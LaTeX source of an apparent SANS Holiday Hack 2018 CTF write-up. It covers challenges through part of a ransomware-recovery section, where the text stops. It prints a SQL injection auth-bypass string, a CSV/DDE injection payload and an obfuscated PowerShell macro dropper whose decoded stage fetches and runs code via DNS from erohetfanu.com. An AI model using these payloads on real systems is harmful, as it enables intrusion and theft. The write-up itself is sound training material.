\documentclass{article}

\usepackage{acronym}
\usepackage{authblk}
\usepackage{booktabs}
\usepackage{float}
\usepackage{fullpage}
\usepackage{hyperref}
\usepackage{graphicx}
\usepackage{listings}
\usepackage{paralist}
\usepackage[final]{pdfpages}
\usepackage{rotating}
\usepackage[caption = false]{subfig}
\usepackage{tikz}
\usepackage{tikzit}
\usepackage{times}
\usepackage{titlesec}
\usepackage{todonotes}
\usepackage{xcolor}
\usepackage{xspace}

\input{latex-listings-powershell.tex}

\graphicspath{{./images/}}

% For use with paralist/inparaenum.
\setdefaultenum{(1)}{(a)}{(i)}{}

% Setting the depth of subsections
\setcounter{secnumdepth}{4}

\definecolor{stringcolor}{RGB}{163,150,118}
\definecolor{keywordcolor}{RGB}{213,15,96}
\definecolor{commentcolor}{RGB}{93,93,93}

% Code Snippets Coloring
\lstdefinestyle{mystyle}{backgroundcolor=\color{black},
    basicstyle=\color{white},
    breakatwhitespace=false,
    breaklines=true,
    captionpos=b,
    commentstyle=\color{commentcolor},
    keepspaces=true,
    keywordstyle=\color{keywordcolor}\bfseries,
    numbers=none,
    numbersep=5pt,
    numberstyle=\color{black},
    showspaces=false,
    showstringspaces=false,
    showtabs=false,
    stringstyle=\color{stringcolor},
    tabsize=2
}
\lstset{style=mystyle}

\hypersetup{colorlinks=true, %set true if you want colored links
    linktoc=all,     %set to all if you want both sections and subsections linked
    linkcolor=black,  %choose some color if you want links to stand out
	urlcolor=blue
}

% Definition of \maketitle
\makeatletter
\def\@maketitle{
\raggedright{}
\begin{center}
{\Huge \bfseries \@title}\\[8ex]
{\huge SANS Holiday Hack 2018}\\[8ex]
\includegraphics[scale=0.50]{kringlecon_invitation}\\[16ex]
{\Large By}\\[4ex]
{\Large  \@author}\\
\@date\\
\end{center}}
\makeatother

\begin{document}

\title{How Santa Almost Stole Christmas \\
    \vspace{10px}
    \huge in the Key of D}
\author{Colin M. Kinsella}

\maketitle
\thispagestyle{empty}

\newpage

\pagebreak
\setcounter{tocdepth}{2}
\tableofcontents

\pagebreak
\begin{abstract}
\noindent SANS has created yet another fun filled Holiday Hack. This year was modeled after a security conference called KringleCon with a variety of speakers giving talks that helped with the individual challenges. The Holiday Hack had a Die Hard theme, with a fitting turn of events at the end where I like to joke that Santa almost stole Christmas. Santa claimed to have devised KringleCon and all the tests as a means to find a defender that could help him in defending the North Pole against even the craftiest attackers, and he used his elves disguised as Toy Soldiers to help along with Hans Gruber. SANS brought back the Cranberry Pi terminals, and this year had a means where you could submit your answers through the web interface. The format of this paper starts with an executive summary of all the answers for the main objectives, the narrative that evolved, a deeper dive into the objectives, followed by the write-ups for the Cranberry Pi terminals that gave hints on how to solve the Objectives. With there being a little bit of Dev Ops this year in the challenges, I decided to write this paper through a continuous integration process on gitlab.com where the artifact of checking in any code is a PDF generated by this LaTeX file.
\end{abstract}

\newpage
\section{Executive Summary}
\begin{enumerate}
    \item Orientation Challenge: \textbf{Happy Trails}
    \item Directory Browsing: \textbf{John McClane}
    \item de Bruijn Sequences: \textbf{Welcome unprepared speaker!}
    \item Data Repo Analysis: \textbf{Yippee-ki-yay}
    \item AD Privilege Discovery: \textbf{LDUBEJ00320@AD.KRINGLECASTLE.COM}
    \item Badge Manipulation: \textbf{19880715}
    \item HR Incident Response: \textbf{Fancy Beaver}
    \item Network Traffic Forensics: \textbf{Mary Had a Little Lamb}
    \item Ransomware Recovery:
    \begin{itemize}
        \item Catch the Malware: \textbf{snort rule below in writeup}
        \item Identify the Domain: \textbf{erohetfanu.com}
        \item Stop the Malware: \textbf{yippeekiyaa.aaay}
        \item Recover Alabaster's Password: \textbf{ED\#ED\#EED\#EF\#G\#F\#G\#ABA\#BA\#B}
    \end{itemize}
    \item Who Is Behind It All?: \textbf{Santa}
\end{enumerate}

\pagebreak
\section{Narrative}
As the narrative evolved through solving the challenges, the following summarizes what happened:

\begin{center}
    As you walk through the gates, a familiar red-suited \\
    holiday figure warmly welcomes all of his special \\
    visitors to KringleCon.
\end{center}

\begin{center}
    Suddenly, all elves in the castle start looking very \\
    nervous. You can overhear some of them talking with worry \\
    in their voices.
\end{center}

\begin{center}
    The toy soldiers, who were always gruff, now seem \\
    especially determined as they lock all the exterior \\
    entrances to the building and barricade all the doors. No \\
    one can get out! And the toy soldiers' grunts take on an \\
    increasingly sinister tone.
\end{center}

\begin{center}
    The toy soldiers act even more aggressively. They are \\
    searching for something --- something very special inside \\
    of Santa’s castle --- and they will stop at NOTHING until \\
    they find it. Hans seems to be directing their \\
    activities.
\end{center}

\begin{center}
    In the main lobby on the bottom floor of Santa's castle, \\
    Hans calls everyone around to deliver a speech. Make sure \\
    you visit Hans to hear his speech.
\end{center}

\begin{center}
    The toy soldiers continue behaving very rudely, grunting \\
    orders to the guests and to each other in vaguely \\
    Germanic phrases. Suddenly, one of the toy soldiers \\
    appears wearing a grey sweatshirt that has written on it \\
    in red pen, ``NOW I HAVE A ZERO-\textnormal{DAY}. HO-HO-HO.''
\end{center}

\begin{center}
    A rumor spreads among the elves that Alabaster has lost \\
    his badge. Several elves say, ``What do you think someone \\
    could do with that?''
\end{center}

\begin{center}
    Hans has started monologuing again. Please visit him in \\
    Santa's lobby for a status update.
\end{center}

\begin{center}
    Great work! You have blocked access to Santa's \\
    treasure\ldots for now. Please visit Hans in Santa's Secret \\
    Room for an update.
\end{center}

\begin{center}
    And then suddenly, Hans slips and falls into a snowbank. \\
    His nefarious plan thwarted, he's now just cold and wet.
\end{center}

\begin{center}
    But Santa still has more questions for you to solve!
\end{center}

\begin{center}
    Congrats! You have solved the hardest challenge! Please \\
    visit Santa and Hans inside Santa's Secret Room for an \\
    update on your amazing accomplishment!
\end{center}

\section{Objectives}

\subsection{Orientation Challenge}
\subsubsection{Objective}
What phrase is revealed when you answer all of the questions at the KringleCon Holiday Hack History kiosk inside the castle? \textit{For hints on achieving this objective, please visit Bushy Evergreen and help him with the Essential Editor Skills Cranberry Pi terminal challenge.}

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.1]{kiosk}
    \caption{Screenshot of Orientation Challenge}
\end{figure}

\subsubsection{Discussion}
I have been participating in all of the SANS Holiday Hacks since at least 2012, so I had most of the answers at the tip of my tongue. All the questions could be answered from the description of the challenge, and the previous challenges were conveniently archived at \href{https://www.holidayhackchallenge.com/}{https://www.holidayhackchallenge.com/} by year such as 2017 was at \href{https://www.holidayhackchallenge.com/2017}{https://www.holidayhackchallenge.com/2017}. A quick google search also points you in this direction. The hint provided by Bush Evergreen by solving the \hyperref[cranberry_pi_essential_skills_hint]{\bfseries Essential Skills Cranberry Pi Terminal Challenge} also helped in solving the Orientation Challenge.

\subsubsection{Question 1}
In 2015, the Dosis siblings asked for help understanding what piece of their ``Gnome in Your Home'' toy? \\
\textbf{Answer:} Firmware

\subsubsection{Question 2}
In 2015, the Dosis siblings disassembled the conspiracy dreamt up by which corporation? \\
\textbf{Answer:} ATNAS

\subsubsection{Question 3}
In 2016, participants were sent off on a problem-solving quest based on what artifact that Santa left? \\
\textbf{Answer:} Business Card

\subsubsection{Question 4}
In 2016, Linux terminals at the North Pole could be accessed with what kind of computer? \\
\textbf{Answer:} Cranberry Pi

\subsubsection{Question 5}
In 2017, the North Pole was being bombarded by giant objects. What were they? \\
\textbf{Answer:} Snowballs

\subsubsection{Question 6}
In 2017, Sam the snowman needed help reassembling pages torn from what? \\
\textbf{Answer:} The Great Book

\subsubsection{Answer: Happy Trails}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.1]{objective1_answer}
    \caption{Screenshot of Orientation Challenge Answer}
\end{figure}

\subsection{Directory Browsing}
\subsubsection{Objective}
Who submitted (First Last) the rejected talk titled \textit{Data Loss for Rainbow Teams: A Path in the Darkness}? \href{https://cfp.kringlecastle.com/}{Please analyze the CFP site to find out}. \textit{For hints on achieving this objective, please visit Minty Candycane and help her with the The Name Game Cranberry Pi terminal challenge.}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective2_directory_indexing}
    \caption{Screenshot of Directory Indexing}
\end{figure}

\subsubsection{Discussion}
Minty Candycane provided a hint about finding browsable directories by solving \hyperref[cranberry_pi_the_name_game_hint]{\bfseries The Name Game Cranberry Pi Terminal Challenge}. By browsing to the following url: \href{https://cfp.kringlecastle.com/cfp/}{https://cfp.kringlecastle.com/cfp/}, directory indexing was enabled that listed files that should not have been displayed. The file of interest was rejected-talks.csv. In this file there was a rejected talk titled Data Loss for Rainbow Teams: A Path in the Darkness that provided the first and last name we were interested in.

\subsubsection{Answer: John McClane}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective2_answer}
    \caption{Screenshot of Directory Browsing Answer}
\end{figure}


\subsection{de Bruijn Sequences}
\subsubsection{Objective}
When you break into the speaker unpreparedness room, what does Morcel Nougat say? \textit{For hints on achieving this objective, please visit Tangle Coalbox and help him with Lethal ForensicELFication Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
By solving the \hyperref[cranberry_pi_lethal_forensicelfication_hint]{\bfseries Lethal ForensicELFication Cranberry Pi Terminal Challenge}, the hint of the de Bruijn Sequence generator, and Tangle's comment on \textit{k=4, n=4}, it was as simple as inputting all the text generated from the generator. The zeroes were substituted as triangles, ones were substituted as squares, twos were substituted as circles, and threes were substituted as stars. Tangle also gave a hint on \href{https://hackaday.com/2018/06/18/opening-a-ford-with-a-robot-and-the-de-bruijn-sequence/}{Opening a Ford Lock Code}, which was an interesting read since I own a Ford with the type of lock specified. The circular nature of the sequence allows the efficiency of not having to try every permutation one after another.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.15]{objective3_generator}
    \caption{Screenshot of de Bruijn Sequence Generation}
\end{figure}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.1]{objective3_combination}
    \caption{Screenshot of Successful Combination}
\end{figure}

\subsubsection{Answer: Welcome unprepared speaker!}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective3_answer}
    \caption{Screenshot of Conversation with Morcel Nougat}
\end{figure}


\subsection{Data Repo Analysis}
\subsubsection{Objective}
Retrieve the encrypted ZIP file from the \href{https://git.kringlecastle.com/Upatree/santas_castle_automation}{North Pole Git repository}. What is the password to open this file? \textit{For hints on achieving this objective, please visit Wunorse Openslae and help him with Stall Mucking Report Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
By solving the \hyperref[cranberry_pi_stall_mucking_report_hint]{\bfseries Stall Mucking Report Cranberry Pi Terminal Challenge}, Wunorse Openslae gave a hint about using \href{https://github.com/dxa4481/truffleHog}{Trufflehog} to find key information left in~.git commits. Running Trufflehog resulted in the following password (there was also a private RSA key found, and the web application secret):

\begin{lstlisting}[language=bash, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Trufflehog Command Snippet]
	trufflehog --entropy=True https://git.kringlecastle.com/Upatree/santas_castle_automation.git
\end{lstlisting}

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.5]{objective4_password}
    \caption{Password recovered by Trufflehog}
\end{figure}

\subsubsection{Answer: Yippee-ki-yay}
An encrypted ZIP file with schematics was found at the \href{https://git.kringlecastle.com/Upatree/santas_castle_automation}{North Pole Git repository}. It can be unlocked with the password \textit{Yippee-ki-yay}. The following schematics were found:

\begin{figure}[H]
    \centering
	\subfloat[First Floor Schematics]{\includegraphics[scale=0.25]{ventilation_diagram_1F}}
	\qquad
	\subfloat[Second Floor Schematics]{\includegraphics[scale=0.25]{ventilation_diagram_2F}}
\end{figure}
The schematics can be used to navigate through the Google Ventilation Maze to get into Santa's secret room.


\subsection{AD Privilege Discovery}
\subsubsection{Objective}
Using the data set contained in this \href{https://download.holidayhackchallenge.com/HHC2018-DomainHack\_2018-12-19.ova}{SANS Slingshot Linux image}, find a reliable path from a Kerberoastable user to the Domain Admins group. What’s the user’s logon name? Remember to avoid RDP as a control path as it depends on separate local privilege escalation flaws. \textit{For hints on achieving this objective, please visit Holly Evergreen and help her with the CURLing Master Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
Holly Evergreen provided a hint about using a tool called \textit{Bloodhound} for testing Active Directory implementations by solving the \hyperref[cranberry_pi_curling_master_hint]{\bfseries CURLing Master Cranberry Pi Terminal Challenge}. After downloading and opening the SANS Slingshot Linux image, I opened Bloodhound and quickly found the query to look for the shortest path to domain admins from Kerberoastable users.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.3]{objective5_query}
    \caption{Bloodhound Query to find the Shortest Path to Domain Admins from Kerberoastable Users}
\end{figure}

\noindent After running the query, it became evident there was one path to the Domain Admins group that did not have the \textit{CanRDP} attribute. The path is highlighted in red in the following figure, and on the left hand side of the figure is all the user info for Leanne Dubej including her login name:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.3]{objective5_target_user}
    \caption{Screenshot of a Kerberoastable user to the Domain Admins Group avoiding RDP}
\end{figure}

\subsubsection{Answer: LDUBEJ00320@AD.KRINGLECASTLE.COM}


\subsection{Badge Manipulation}
\subsubsection{Objective}
Bypass the authentication mechanism associated with the room near Pepper Minstix. \href{https://www.holidayhackchallenge.com/2018/challenges/alabaster\_badge.jpg}{A sample employee badge is available}. What is the access control number revealed by the door authentication panel? \textit{For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
Pepper Ministix provided a hint about a SQL database error when scanning a QR code with special characters by solving the \hyperref[cranberry_pi_yule_log_analysis_hint]{\bfseries Yule Log Analysis Cranberry Pi Terminal Challenge}. She also provided a link on how to create QR codes online: \href{https://www.the-qrcode-generator.com/}{Creating QR Barcodes}, and a link about \href{https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF#Auth_Bypass}{SQL Injection}. \\

\noindent To determine more information about the bug I started by just inputting a single quote.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective6_quote}
    \caption{Single Quote QR Code Response}
\end{figure}

\noindent This information helped to craft the union select query for the bypass with the following fields: \textit{first\_name, last\_name, enabled from employees where authorized}. Placing a 1~in the enabled field along with ensuring authorized equaled 1 or True, set the conditions for the bypass. \\

\begin{lstlisting}[language=SQL, columns=fullflexible, caption=SQL Injection String to Bypass Authentication Mechanism]
	1' union select first_name,last_name,1 from employees where authorized='1
\end{lstlisting}

\noindent Utilizing the online QR code generator provided Pepper Ministix generated the following QR code to bypass the authentication mechanism through the USB interface:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.5]{alabaster_qr_code}
    \caption{SQL Injection QR Code for Access}
\end{figure}

\subsubsection{Answer: 19880715}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective6_success}
    \caption{Successful Bypass with Access Control Number Result}
\end{figure}


\subsection{HR Incident Response}
\subsubsection{Objective}
Santa uses an Elf Resources website to look for talented information security professionals. \href{https://careers.kringlecastle.com/}{Gain access to the website} and fetch the document C:\textbackslash~candidate\_evaluation.docx. Which terrorist organization is secretly supported by the job applicant whose name begins with ``K.'' \textit{For hints on achieving this objective, please visit Sparkle Redberry and help her with the Dev Ops Fail Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
Sparkle Redberry provided a hint on \href{https://www.owasp.org/index.php/CSV_Injection}{OWASP CSV Injection} by solving the \hyperref[cranberry_pi_dev_ops_fail_hint]{\bfseries Dev Ops Fail Cranberry Pi Terminal Challenge}. She also gave a hint to see Brian Hostetler's talk on \href{https://www.youtube.com/watch?v=Z3qpcKVv2Bg}{CSV DDE Injection}. \\

\noindent One of the first things I did to analyze the website was to see if there was a robots.txt file. There was not, but the error page provided a lot of good directory information for a targeted CSV Injection attack as shown in the following figure:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective7_error}
    \caption{Elf Resources Website Error}
\end{figure}

\noindent Filling out the fields of information was self explanatory, and attaching a CSV file was straight forward.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.3]{objective7_submission}
    \caption{Elf Resources Website Submission}
\end{figure}

\noindent Upon successfully uploading a CSV file there was a clear message on the location of the secret list of potential new elf hires that we want.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.5]{objective7_upload_location}
    \caption{Secret List of Potential New Elf Hires Location}
\end{figure}

The following malicious CSV file was created to conduct the attack:
\begin{lstlisting}[language=bash, columns=fullflexible, caption=CSV Injection to Copy Secret List of Potential New Elf Hires]
	=cmd|'/c copy C:\candidate_evaluation.docx C:\careerportal\resources\public\test.docx'!A1
\end{lstlisting}

\noindent The injection causes the \textit{candidate\_evaluation.docx} to be copied into the public directory, where it can be downloaded at \href{https://careers.kringlecastle.com/public/test.docx}{https://careers.kringlecastle.com/public/test.docx}.

\subsubsection{Answer: Fancy Beaver}
Examining the document, it is clear that Krampus is the job applicant, and he is linked to the terrorist Organization known as \textit{Fancy Beaver}. The following two figures show snippets from the document recovered.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective7_upload_document1}
    \caption{Krampus Job Application}
\end{figure}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective7_upload_document2}
    \caption{Krampus Terrorist Organization Link}
\end{figure}


\subsection{Network Traffic Forensics}
\subsubsection{Objective}
Santa has introduced a web-based packet capture and analysis tool at \href{https://packalyzer.kringlecastle.com}{https://packalyzer.kringlecastle.com/} to support the elves and their information security work. Using the system, access and decrypt HTTP/2 network activity. What is the name of the song described in the document sent from Holly Evergreen to Alabaster Snowball? \textit{For hints on achieving this objective, please visit SugarPlum Mary and help her with the Python Escape from LA Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
Sugarplum Mary provided a hint that the Packalyzer website had server side source code, manipulating the URL gave weird and descriptive errors, and that to watch the HTTP2 talks at Kringlecon by the Chrises after solving the \hyperref[cranberry_pi_python_escape_from_la_hint]{\bfseries Python Escape from LA Cranberry Pi Terminal Challenge}. \\

\noindent I started off by creating a user account, logging in and seeing the functionality of the website. There was the ability to sniff traffic on the website for 20 seconds, and to conduct basic analysis of packet captures including pie charts of protocols, top ports, and top talkers. There was also the ability to look at your account profile, and the ability to download packet captures. The problem with downloading a packet capture is that it has encrypted HTTP2 TLS traffic. One of the talks that Sugarplum Mary hinted at was how to decrypt \href{https://www.youtube.com/watch?v=9E-8HkDs-kQ\&t=2s}{HTTP2 traffic with the appropriate SSL keys}. \\

\noindent Looking at the source code and going off of Sugarplum Mary's hint of the website providing weird and descriptive errors. I found that there was a \textit{pub} directory that seemed interesting. Any existing directory would provide an \textit{illegal operation on a directory} error. This confirmed that a given directory existed.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_pub_dir}
    \caption{Public Directory Error}
\end{figure}

\noindent The web application appeared that it could be a Node.js application, so I attempted to browse to app.js. This is generally the root file that a Node.js web application is started from. I was also going off of the hint from Sugarplum Mary on being able to view Server Side Source code from the website. Sure enough, I could view the source code:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_app_js}
    \caption{App.js Source Code}
\end{figure}

\noindent One of the comments stated that environmental variables could be used to open up directories during development when in a development mode. The source code appeared to use environmental variables to build the path to where the SSLKEYLOGFILE was located as shown above. The SSLKEYLOGFILE could be used to decrypt the packet capture that was created on the Packalyzer website. The first part of the path that I verified was that the DEV directory existed:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_dev_dir}
    \caption{Verifying DEV Directory}
\end{figure}

\noindent The next piece of the puzzle was to verify how the environmental variables worked with the web application. HOME is a standard environmental variable. The web application provided its' HOME path:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_env_var}
    \caption{Determining How Environmental Variables Work with the Web Application}
\end{figure}

\noindent Seeing how I could get the web application to print out environmental variables through the error message, I determined the name of the SSLKEYLOGFILE\@.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_keylog_file_name}
    \caption{SSLKEYLOGFILE Name}
\end{figure}

\noindent Putting it altogether from the logic in the source code I was able to retrieve the SSLKEYLOGFILE at the following path: 
\href{https://packalyzer.kringlecastle.com/DEV/packalyzer\_clientrandom\_ssl.log}{https://packalyzer.kringlecastle.com/DEV/packalyzer\_clientrandom\_ssl.log}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_keylog_file_path}
    \caption{SSLKEYLOGFILE File Path}
\end{figure}

\noindent After downloading the SSLKEYLOGFILE, I could finally decrypt the packet captures:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_wireshark_setup}
    \caption{Setting up Wireshark to use the SSLKEYLOGFILE}
\end{figure}

\noindent Looking at the decrypted packet capture, it became evident that there were a few users that were attempting to login. The packet of interest was right after a \textit{POST /api/login} where the login username and password were submitted through a DATA application/json submission.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_password}
    \caption{Finding Passwords in the Packet Capture}
\end{figure}

\noindent The following usernames and passwords were found: \\
\textbf{username:} pepper \\
\textbf{password:} Shiz-Bamer\_wabl182 \\
\\
\textbf{username:} bushy \\
\textbf{password:} Floppity\_Floopy-flab19283 \\
\\
\textbf{username:} alabaster \\
\textbf{password:} Packer-p@re-turntable192 \\

\noindent The only admin user out of the credentials found was Alabaster, and he had an interesting file labeled \\
\textit{super\_secret\_packet\_capture.pcap}.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective8_alabaster_profile}
    \caption{Alabaster Profile}
\end{figure}

\noindent Analyzing the packet capture, it was easy to follow the TCP stream and see an e-mail from Holly Evergreen to Alabaster Snowball with an attachment. The message gave information on how to transpose music and the hint that Alabaster's favorite key was D.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_secret_packet_capture}
    \caption{Secret Packet Capture}
\end{figure}

\noindent Parsing out the PDF document that was attached to the e-mail from Holly Evergreen to Alabaster Snowball, there were instructions on how to transpose music.
\begin{figure}[H]\label{transpose_music}
    \centering
    \includegraphics[scale=0.4]{objective8_transpose}
    \caption{Transposing Music Instructions}
\end{figure}

\subsubsection{Answer: Mary Had a Little Lamb}
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.4]{objective8_song}
    \caption{Song Described in Attached Document}
\end{figure}


\subsection{Ransomware Recovery}
\subsubsection{Objective}
Alabaster Snowball is in dire need of your help. Santa's file server has been hit with malware. Help Alabaster Snowball deal with the malware on Santa's server by completing several tasks. \textit{For hints on achieving this objective, please visit Shinny Upatree and help him with the Sleigh Bell Lottery Cranberry Pi terminal challenge}.

\subsubsection{Discussion}
Shinny Upatree provided hints about the Wannacookie Malware by the solving the \hyperref[cranberry_pi_sleigh_bell_lottery_hint]{\bfseries Sleigh Bell Lottery Cranberry Pi Terminal Challenge}. One specific hint was to watch the \href{https://www.youtube.com/watch?v=wd12XRq2DNk\&t=429s}{Powershell Malware talk at KringleCon}. Shinny Upatree also stated that the malware communicated over DNS, and it appears to pull its' public keys over this way. Shinny acknowledges that for proper public key encryption to work a private key is also necessary, and eludes to maybe there is a flaw in the server that the malware communicates with. Lastly, Shinny states that if we can retrieve our our keys from memory, decrypt an asymmetric key, then we should be able to decrypt the ransomed files.

\subsubsection{Catch the Malware}
Assist Alabaster by building a Snort filter to identify the malware plaguing Santa's Castle.
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.25]{objective9_snort_challenge}
    \caption{Screenshot of Snort IDS Challenge}
\end{figure}

\paragraph{Discussion} \mbox{} \\
\noindent There was a common string of \textit{77616E6E61636F6F6B69652E6D696E2E707331} found in all the packets. When decoding the text, this translated to \textit{wannacookie.min.ps1}.

\paragraph{Answer:} \mbox{} \\
\noindent The following Snort filter was crafted to detect both inbound and outbound DNS traffic that contained the common string:
\begin{figure}[H]
    \centering
    \includegraphics[scale=0.5]{snort_filter}
    \caption{Snort Filter to Identify WannaCookie}
\end{figure}

\begin{figure}[H]
    \centering
    \includegraphics[scale=0.5]{catch_malware_solve}
    \caption{Screenshot of Catching the Ransomware Malware}
\end{figure}

\subsubsection{Identify the Domain}
Using the Word docm file, identify the domain name that the malware communicates with.

\paragraph{Discussion} \mbox{}
\begin{flushleft}
\noindent By catching the malware with the Snort IDS rule, Alabaster gave us the next piece of the challenge: \mbox{} \\
\end{flushleft}
\begin{centering}
\textit{Thank you so much! Snort IDS is alerting on each new ransomware infection in our network.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{Hey, you're pretty good at this security stuff. Could you help me further with what I suspect is a malicious Word document?} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{All the elves were emailed a cookie recipe right before all the infections. Take this \href{https://www.holidayhackchallenge.com/2018/challenges/CHOCOLATE_CHIP_COOKIE_RECIPE.zip}{document} with a password of elves and find the domain it communicates with.} \mbox{} \\
\end{centering}

\mbox{} \\
\noindent Word documents are just zip files. Change the extension to~.zip and you can extract everything inside of them. Extracting the files there was a vbaProject.bin that looked interesting that the Word document loads when opening the file. Inside the binary, there is a powershell command line script that is executed to gain execution on the host when the word document is opened. 

\mbox{} \\
\noindent The following was embedded into the document as a VBA Macro:
\begin{lstlisting}[language=PowerShell, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=VBA Macro Powershell Malware]
powershell.exe -NoE -Nop -NonI -ExecutionPolicy Bypass -C "sal a New-Object; iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJc
(*\qquad*)JyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH/kMy9gXREohG'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
\end{lstlisting}

\mbox{} \\
\noindent Removing the no exit (-NoE), no profile (-Nop), Noninteractive (-NonI), invoke expression (iex), the powershell script can be used to decode and decompress the payload by itself without executing the follow on payload.
\begin{lstlisting}[language=Powershell, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=How to Reverse the Malware]
powershell.exe -ExecutionPolicy Bypass -C "sal a New-Object; (a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('lVHRSsMwFP2VSwksYUtoWkxxY4iyir4oaB+EMUYoqQ1syUjToXT7d2/1Zb4pF5JDzuGce2+a3tXRegcP2S0lmsFA/AKIBt4ddjbChArBJnCCGxiAbOEMiBsfSl23MKzrVocNXdfeHU2Im/k8euuiVJRsZ1Ixdr5UEw9LwGOKRucFBBP74PABMWmQSopCSVViSZWre6w7da2uslKt8C6zskiLPJc
(*\qquad*)JyttRjgC9zehNiQXrIBXispnKP7qYZ5S+mM7vjoavXPek9wb4qwmoARN8a2KjXS9qvwf+TSakEb+JBHj1eTBQvVVMdDFY997NQKaMSzZurIXpEv4bYsWfcnA51nxQQvGDxrlP8NxH/kMy9gXREohG'),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
\end{lstlisting}

\mbox{} \\
\noindent The decoded payload had a Hex to ASCII function, that will decode 77616E6E61636F6F6B69652E6D696E2E707331 to wannacookie.min.ps1. It will then use DNS as a transport to download and execute the follow on wannacookie powershell script. It was clear that the malware was communicating with the erohetfanu.com domain.
\begin{lstlisting}[language=PowerShell, breaklines, escapeinside={(*}{*)}, columns=fullflexible, caption=Decoded Malware]
function H2A((*\$*)a) {(*\$*)o; (*\$*)a -split '(..)' | (*?*) (*{*) (*\$*)_ }  | forEach {[char]([convert]::toint16((*\$*)_,16))} | forEach {(*\$*)o = (*\$*)o + (*\$*)_}; return (*\$o*)}; (*\$*)f = "77616E6E61636F6F6B69652E6D696E2E707331"; (*\$*)h = ""; foreach ((*\$*)i in 0..([convert]::ToInt32((Resolve-DnsName -Server erohetfanu.com -Name "(*\$*)f.erohetfanu.com" -Type TXT).strings, 10)-1)) {(*\$*)h += (Resolve-DnsName -Server erohetfanu.com -Name "(*\$*)i.(*\$*)f.erohetfanu.com" -Type TXT).strings}; iex((*\$*)(H2A (*\$*)h | Out-string))
\end{lstlisting}

\paragraph{Answer: erohetfanu.com}


\subsubsection{Stop the Malware}
Identify a way to stop the malware in its tracks!

\paragraph{Discussion} \mbox{}
\begin{flushleft}
\noindent After identifying the domain Alabaster stated: \mbox{} \\
\end{flushleft}
\begin{centering}
\textit{Erohetfanu.com, I wonder what that means? Unfortunately, Snort alerts show multiple domains, so blocking that one won't be effective.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{I remember another ransomware in recent history had a killswitch domain that, when registered, would prevent any further infections.} \mbox{} \\ \mbox{} \\
\end{centering}
\begin{centering}
\textit{Perhaps there is a mechanism like that in this ransomware? Do some more analysis and see if you can find a fatal flaw and activate it!} \mbox{} \\ \mbox{} \\
\end{centering}

\noindent A random easter egg was finding out what erohetfanu.com was. If you use a ROT13 decoder, then the text becomes \textit{reburgsnah} or \textbf{Hans Gruber}. Very fitting for the Die Hard theme. The big hint for stopping the malware was that there may be a kill switch for it. The article that Alabaster referred to was \href{https://www.wired.com/2017/05/accidental-kill-switch-slowed-fridays-massive-ransomware-attack/}{How an Accidental `Kill Switch' Slowed Friday's Massive Ransomeware Attack}. The WannaCry malware had a kill switch that was activated by registering a domain name. If it worked for WannaCry, then it might work for WannaCookie. \mbox{} \\

